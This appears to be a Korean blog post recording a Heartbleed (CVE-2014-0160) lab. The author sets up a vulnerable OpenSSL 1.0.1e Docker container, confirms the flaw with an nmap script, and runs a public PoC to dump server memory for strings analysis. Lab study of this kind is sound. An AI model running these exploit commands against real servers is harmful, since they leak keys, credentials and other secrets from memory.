Notice
Recent Posts
Recent Comments
Link
«   2024/11   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
Archives
Today
Total
관리 메뉴

의미없는 블로그

[CVE-2014-0160] HeartBleed OpenSSL 1.0.1e 설치 본문

# 나/exploit CVE

[CVE-2014-0160] HeartBleed OpenSSL 1.0.1e 설치

SaltLee 2019. 8. 23. 17:34

참고 : https://hub.docker.com/r/hmlio/vaas-cve-2014-0160

PoC : https://github.com/sensepost/heartbleed-poc

 

$ docker pull hmlio/vaas-cve-2014-0160 : 이미지 다운로드

$ docker images : 이미지 확인

$ docker run -it -d -P --expose="443" --name heartbleed hmlio/vaas-cve-2014-0160 /bin/bash : 컨테이너 생성

$ docker start heartbleed : 컨테이너 시작

 

$ docker exec -u 0 -it heartbleed /bin/bash : 컨테이너 들어가기

# service apache2 start : 아파치 실행

# exit : 컨테이너 나오기

 

$ ifconfig | grep inet : IP 확인

$ docker ps : 컨테이너 포트 확인

http://IP:포트 : 서비스 정상 접속 확인

 

nmap -sV -p 32781 --script=ssl-heartbleed 192.168.19.138 : nmap 스크립트로 취약여부 확인

 

python heartbleed-poc.py -p 32781 -n 500 -f result.bin 192.168.19.138 : PoC 로 result.bin 파일 생성

 

strings result.bin >> result.txt : result.bin 파일 result.txt 로 만든다

 

파일 내 중요정보 확인한다

Comments